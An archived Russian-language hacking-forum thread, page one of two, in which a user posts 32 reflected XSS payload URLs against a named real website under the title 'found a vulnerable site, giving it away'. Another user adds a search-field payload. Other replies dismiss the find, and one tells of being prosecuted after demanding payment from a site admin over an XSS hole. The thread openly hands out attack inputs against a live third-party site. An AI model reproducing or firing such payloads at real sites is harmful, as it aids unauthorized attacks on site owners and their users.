HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
Перезагрузить страницу Нашел уязвимый сайт, отдаю.
   
Ответ
Страница 1 из 2 1 2 >
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 22.06.2017, 23:23
couldnot332
Guest
Сообщений: n/a
Провел на форуме:
2182

Репутация: 0
По умолчанию
Уязвимости:

| XSS:

| [+] Vul[1] [XSS] http://mirtesen.ru/market/dom-i-dach...dushki?vendor=">alert('XSS')

| [+] Vul[2] [XSS] http://mirtesen.ru/market/dom-i-dach...dushki?vendor=">'';!--"=&{()}

| [+] Vul[3] [XSS] http://mirtesen.ru/market/dom-i-dach...dushki?vendor=">

| [+] Vul[4] [XSS] http://mirtesen.ru/market/dom-i-dach...dushki?vendor=">

| [+] Vul[5] [XSS] http://mirtesen.ru/market/dom-i-dach...dushki?vendor=">

| [+] Vul[6] [XSS] http://mirtesen.ru/market/dom-i-dach...dushki?vendor=">

| [+] Vul[7] [XSS] http://mirtesen.ru/market/dom-i-dach...dushki?vendor=">

| [+] Vul[8] [XSS] http://mirtesen.ru/market/dom-i-dach...dushki?vendor=">

| [+] Vul[9] [XSS] http://mirtesen.ru/market/dosug-i-ra...umenty?vendor=">alert('XSS')

| [+] Vul[10] [XSS] http://mirtesen.ru/market/dosug-i-ra...umenty?vendor=">'';!--"=&{()}

| [+] Vul[11] [XSS] http://mirtesen.ru/market/dosug-i-ra...umenty?vendor=">

| [+] Vul[12] [XSS] http://mirtesen.ru/market/dosug-i-ra...umenty?vendor=">

| [+] Vul[13] [XSS] http://mirtesen.ru/market/dosug-i-ra...umenty?vendor=">

| [+] Vul[14] [XSS] http://mirtesen.ru/market/dosug-i-ra...umenty?vendor=">

| [+] Vul[15] [XSS] http://mirtesen.ru/market/dosug-i-ra...umenty?vendor=">

| [+] Vul[16] [XSS] http://mirtesen.ru/market/dosug-i-ra...umenty?vendor=">

| [+] Vul[17] [XSS] http://mirtesen.ru/market/dosug-i-ra...a/bilety?sort=">alert('XSS')

| [+] Vul[18] [XSS] http://mirtesen.ru/market/dosug-i-ra...a/bilety?sort=">'';!--"=&{()}

| [+] Vul[19] [XSS] http://mirtesen.ru/market/dosug-i-ra...a/bilety?sort=">

| [+] Vul[20] [XSS] http://mirtesen.ru/market/dosug-i-ra...a/bilety?sort=">

| [+] Vul[21] [XSS] http://mirtesen.ru/market/dosug-i-ra...a/bilety?sort=">

| [+] Vul[22] [XSS] http://mirtesen.ru/market/dosug-i-ra...a/bilety?sort=">

| [+] Vul[23] [XSS] http://mirtesen.ru/market/dosug-i-ra...a/bilety?sort=">

| [+] Vul[24] [XSS] http://mirtesen.ru/market/dosug-i-ra...a/bilety?sort=">

| [+] Vul[25] [XSS] http://mirtesen.ru/market/dosug-i-ra...muzyka?vendor=">alert('XSS')

| [+] Vul[26] [XSS] http://mirtesen.ru/market/dosug-i-ra...muzyka?vendor=">'';!--"=&{()}

| [+] Vul[27] [XSS] http://mirtesen.ru/market/dosug-i-ra...muzyka?vendor=">

| [+] Vul[28] [XSS] http://mirtesen.ru/market/dosug-i-ra...muzyka?vendor=">

| [+] Vul[29] [XSS] http://mirtesen.ru/market/dosug-i-ra...muzyka?vendor=">

| [+] Vul[30] [XSS] http://mirtesen.ru/market/dosug-i-ra...muzyka?vendor=">

| [+] Vul[31] [XSS] http://mirtesen.ru/market/dosug-i-ra...muzyka?vendor=">

| [+] Vul[32] [XSS] http://mirtesen.ru/market/dosug-i-ra...muzyka?vendor=">
 
Ответить с цитированием

  #2  
Старый 23.06.2017, 03:53
h3xp1017
Guest
Сообщений: n/a
Провел на форуме:
27207

Репутация: 1
По умолчанию
да там и в поиске такая же ***ня и скорее всего вообще в любом поле

http://mirtesen.ru/market/search?search=">alert('pwn')
 
Ответить с цитированием

  #3  
Старый 23.06.2017, 07:38
zer0_igL
Guest
Сообщений: n/a
Провел на форуме:
106366

Репутация: 4
По умолчанию
Хрень, нечего интересного!!!!! Постоянно перекидывает на search
 
Ответить с цитированием

  #4  
Старый 23.06.2017, 13:52
SooLFaa
Guest
Сообщений: n/a
Провел на форуме:
187765

Репутация: 154
По умолчанию
И зачем для этого создавать отдельную тему? Есть соответствующая тема, для такой мелочевки, другое дело если бы ты известный ресурс какой слил, а тут всего лишь ХСС'ки
 
Ответить с цитированием

  #5  
Старый 23.06.2017, 15:39
h3xp1017
Guest
Сообщений: n/a
Провел на форуме:
27207

Репутация: 1
По умолчанию
Цитата:
Сообщение от SooLFaa  
SooLFaa said:

И зачем для этого создавать отдельную тему? Есть соответствующая тема, для такой мелочевки, другое дело если бы ты известный ресурс какой слил, а тут всего лишь ХСС'ки
при том найденные сканером
 
Ответить с цитированием

  #6  
Старый 24.06.2017, 17:09
JustBE
Guest
Сообщений: n/a
Провел на форуме:
2386

Репутация: 0
По умолчанию
полная шляпа, перекидывает на search
 
Ответить с цитированием

  #7  
Старый 06.07.2017, 14:30
Coost
Guest
Сообщений: n/a
Провел на форуме:
80012

Репутация: 5
По умолчанию
Меня так чуть не посадили за взлом сайта городской газеты с активной хсс
 
Ответить с цитированием

  #8  
Старый 06.07.2017, 15:18
zer0_igL
Guest
Сообщений: n/a
Провел на форуме:
106366

Репутация: 4
По умолчанию
Цитата:
Сообщение от Coost  
Coost said:

Меня так чуть не посадили за взлом сайта городской газеты с активной хсс
Анонимности тебе не занимать)))
 
Ответить с цитированием

  #9  
Старый 06.07.2017, 15:26
Coost
Guest
Сообщений: n/a
Провел на форуме:
80012

Репутация: 5
По умолчанию
Цитата:
Сообщение от zer0_igL  
zer0_igL said:

Анонимности тебе не занимать)))
Да я и сайту не врядил. Вставил безобидный алерт скрипт, связался с админом, предложил показать дырку за копейки, он согласился. Дал ему номер вебмани, он написал заявление в мусарню. Менты подали запрос в вебмани и получили мои данные (работали тк заяву написали журналисты, а так обычно им пох).

Ну и потом комп на экспертизу (благо, что ничего кроме этой формы не копали) и суд по статье 361 УК Украины.

Вот и делай людям добро. Пробили только по кошельку, анонимности хватало.
 
Ответить с цитированием

  #10  
Старый 06.07.2017, 18:07
zer0_igL
Guest
Сообщений: n/a
Провел на форуме:
106366

Репутация: 4
По умолчанию
Цитата:
Сообщение от Coost  
Coost said:

Да я и сайту не врядил. Вставил безобидный алерт скрипт, связался с админом, предложил показать дырку за копейки, он согласился. Дал ему номер вебмани, он написал заявление в мусарню. Менты подали запрос в вебмани и получили мои данные (работали тк заяву написали журналисты, а так обычно им пох).
Ну и потом комп на экспертизу (благо, что ничего кроме этой формы не копали) и суд по статье 361 УК Украины.
Вот и делай людям добро. Пробили только по кошельку, анонимности хватало.
Админ пидаром оказало, краснопузый мудозвон...
 
Ответить с цитированием
Ответ
Страница 1 из 2 1 2 >



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ